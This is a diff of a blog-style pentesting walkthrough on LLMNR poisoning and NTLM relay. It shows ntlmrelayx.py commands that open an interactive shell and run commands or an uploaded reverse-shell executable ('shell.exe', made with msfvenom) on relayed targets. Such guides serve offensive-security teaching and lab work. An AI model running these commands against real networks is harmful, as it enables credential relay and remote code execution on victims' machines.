kali-mx/BlogContent/LLMNR_POISONING.md

 syntax: `ntlmrelayx.py -tf targets.txt -smb2support -i`
 ![image](https://user-images.githubusercontent.com/76034874/187008783-7a4a8830-4796-495e-b1a1-8efafd69e439.png)

 #### Now we start a netcat listener in another terminal on our attack box at 127.0.0.1 11002 and we open up to a shell.
 Type 'help' to see a list of commands.
 We can upload or download files with `get` and `put`.
-We could upload our own reverse shell or run any windows command in the ntlmrelay command line.
+We could run most windows commands in the ntlmrelay command line or upload our own reverse shell.
+For example:
+Syntax: `ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"`
+`ntlmrelayx.py -tf targets.txt -smb2support -e "shell.exe"`
+***Used with msfconsole and msfvenom***

 ![image](https://user-images.githubusercontent.com/76034874/187009309-f8dca5d0-8da0-4e4f-a705-6d289d1bae30.png)
 <img width = "774" alt="image2" src="https://user-images.githubusercontent.com/76034874/187009336-bf0f7849-c3e3-4fa8-a88a-d0e40abb8f4b.png">